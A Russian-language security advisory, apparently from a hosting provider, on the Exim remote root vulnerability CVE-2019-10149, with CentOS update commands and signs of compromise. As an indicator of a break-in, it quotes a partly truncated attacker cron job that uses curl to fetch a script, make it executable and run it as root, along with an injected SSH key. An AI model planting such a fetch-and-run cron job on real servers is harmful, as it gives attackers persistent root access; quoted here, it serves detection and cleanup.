В почтовом сервере Exim, в версиях от 4.87 до 4.91 обнаружена уязвимость CVE-2019-10149, которая позволяет запускать злоумышленникам произвольные команды и процессы от пользователя root. Таким образом потенциально уязвимы несколько миллионов серверов по всему миру. Уязвимость оценивается как критическая (CVSS 3.0 base score = 9.8/10).

Что делать?

В первую очередь необходимо убедиться, что на вашем сервере пакет Exim был обновлен до версии 4.92 и выше. На серверах под управлением CentOS это можно сделать выполнив команду консоле rpm -q exim. Если версия Exim ниже 4.92, то срочно обновитесь!

Инструкция по обновлению Exim

Наши проекты и проекты многих наших клиентов работают на серверах под управлением операционной системы CentOS. Если ваш сервер тоже работает под управлением CentOS, то вам скорее всего подойдут следующие действия.

CentOS 6
yum-config-manager --enable epel-testing
yum -y update exim

CentOS 7
yum -y update exim

Проверка сервера на взлом

Обязательно проверьте сервер на наличие взлома. Если сервер взломан, то у пользователя root будет добавлен публичный ключ, который вы не добавляли:
# cat ~/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1S...UJjnxopqtZ5DrA76WH user@localhost

Также будет добавлено задание в cron, которое вы не добавляли:
# crontab -l
*/11 * * * * tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; ... -O /usr/local/bin/npt) && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

Что делать в случае взлома

  1. Сохраните все данные ваших сайтов в "backup" - файлы и базы данных.
  2. Произведите переустановку операционной системы.
  3. Восстановите сайты из скачанных копий.
  4. Проведите аудит сайтов на наличие вредоносного кода.

Рекомендуем вам вовремя обновлять все важное ПО и использовать только свежие с актуальной поддержкой дистрибутивы и пакеты на своих серверах и рабочих станциях.